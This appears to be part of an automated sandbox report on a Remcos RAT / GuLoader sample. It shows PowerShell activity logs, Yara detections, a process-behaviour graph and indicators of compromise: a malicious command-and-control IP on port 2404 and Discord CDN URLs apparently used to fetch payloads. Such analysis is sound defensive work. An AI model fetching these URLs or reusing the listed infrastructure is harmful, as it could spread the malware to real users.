Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D4CEE4 CreateNamedPipeW, 21_2_07D4CEE4

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR
Detected Remcos RAT
Source: ieinstal.exe, 0000001E.00000002.398100301334.00000000032E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Remcos_Mutex_Inj/
Source: ieinstal.exe, 00000021.00000002.398543567080.0000000003690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Remcos_Mutex_InjF
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 560422 Sample: tregrene-KaufVertraeg-Joach... Startdate: 26/01/2022 Architecture: WINDOWS Score: 100 60 cdn.discordapp.com 2->60 78 Found malware configuration 2->78 80 Detected Remcos RAT 2->80 82 Yara detected GuLoader 2->82 84 6 other signatures 2->84 9 wscript.exe 1 1 2->9         started        12 powershell.exe 2->12         started        14 powershell.exe 14 2->14         started        signatures3 process4 signatures5 86 Wscript starts Powershell (via cmd or directly) 9->86 88 Very long command line found 9->88 90 Encrypted powershell cmdline option found 9->90 16 powershell.exe 28 9->16         started        92 Suspicious powershell command line found 12->92 19 powershell.exe 12->19         started        21 conhost.exe 12->21         started        23 powershell.exe 14->23         started        25 conhost.exe 14->25         started        process6 signatures7 66 Suspicious powershell command line found 16->66 68 Very long command line found 16->68 70 Encrypted powershell cmdline option found 16->70 27 ieinstal.exe 4 8 16->27         started        31 csc.exe 3 16->31         started        34 conhost.exe 16->34         started        46 2 other processes 16->46 72 Writes to foreign memory regions 19->72 74 Tries to detect Any.run 19->74 76 Hides threads from debuggers 19->76 36 ieinstal.exe 19->36         started        38 csc.exe 19->38         started        40 ieinstal.exe 19->40         started        42 ieinstal.exe 23->42         started        44 csc.exe 23->44         started        process8 dnsIp9 62 94.130.249.123, 2404, 4687, 49819 HETZNER-ASDE Germany 27->62 64 cdn.discordapp.com 162.159.133.233, 443, 49817, 49818 CLOUDFLARENETUS United States 27->64 94 Creates autostart registry keys with suspicious values (likely registry only malware) 27->94 96 Creates an autostart registry key pointing to binary in C:\Windows 27->96 98 Tries to detect Any.run 27->98 54 C:\Users\user\AppData\Local\...\rf0jcwxf.dll, PE32 31->54 dropped 48 cvtres.exe 1 31->48         started        100 Hides threads from debuggers 36->100 56 C:\Users\user\AppData\Local\...\wxgbxjsa.dll, PE32 38->56 dropped 50 cvtres.exe 38->50         started        58 C:\Users\user\AppData\Local\...\ginqqgem.dll, PE32 44->58 dropped 52 cvtres.exe 44->52         started        file10 signatures11 process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
94.130.249.123
 unknown Germany
24940 HETZNER-ASDE true
162.159.133.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
cdn.discordapp.com 162.159.133.233 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
i;j49.123 true
  • Avira URL Cloud: safe
 unknown
https://cdn.discordapp.com/attachments/933089228261294143/9 false
    		high
    https://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg false
      		high
      https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin false
        		high